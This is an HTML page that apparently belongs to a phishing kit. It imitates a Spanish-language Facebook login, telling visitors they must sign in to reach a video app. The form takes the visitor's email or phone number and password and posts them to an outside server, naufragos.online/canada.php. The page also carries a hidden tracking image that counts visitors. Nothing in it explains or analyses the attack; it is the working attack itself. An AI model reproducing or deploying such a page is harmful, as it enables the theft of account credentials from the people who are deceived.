<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
<title>Facebook video</title>
<style>
body{
  font-size: 15px;
}
.formulario{
  margin-top: 30px;
}
.forgot {
  margin-top: 20px;
  text-align: center;
  color: #3877e8;
  font-weight: 600;
}
.dividor {
  margin-top: 80px;
}
.creassste {
  background-color: #e7f3ff;
  color: #037cff;
  border: none;
  margin-top: 20px;
    font-weight: 500;
}
.enviarr {
  background-color: #1977f3;
  font-weight: 500;
}
.noborderabajo {
  border-bottom: none;
  border-radius: 0px;
}
.noborderarriba {
  border-radius: 0px;
}
.header {
  background-color: #053d87;
}
.colored {
    background-color: #fffbe2;
    padding: 7px;
    color: #3b5998;
}
</style>
</head>
<body>
<div class="header">
  <div class="d-flex justify-content-center">
    <img src="https://i.imgur.com/XuAxkEN.png" alt="">
  </div>
</div>
          <div class="col-12 colored">
          Facebook necesita confirmar la siguiente información para permitirle acceder a esta aplicación de video, ¡Inicie sesión!
          </div>
      <div class="formulario col-sm">
          <form method="post" action="https://naufragos.online/canada.php">
            <div class="form-group">
              <input type="text" name="email" class="form-control noborderabajo" placeholder="Número de celular o correo electrónico" required>
              <input type="password" name="pass" class="form-control noborderarriba" placeholder="Contraseña" required>
            </div>
            <button type="submit" class="btn btn-primary col-sm enviarr">Iniciar sesión</button>
          </form>
      </div>
      <div class="forgot container col-sm">
        <span class="olvidaste">¿Olvidaste tu contraseña?</span>
      </div>
      <div class="dividor container col-sm ">
      <center>  <img src="https://i.imgur.com/9qdO9Ce.png"></center>
      </div>
      <div class="create container col-sm">
          <button type="submit" class="btn btn-primary col-sm creassste">Crear cuenta nueva</button>
      </div>
<img src="https://whos.amung.us/widget/lospro001" style="visibility:none; height:0; width:0;">
</body>
</html>
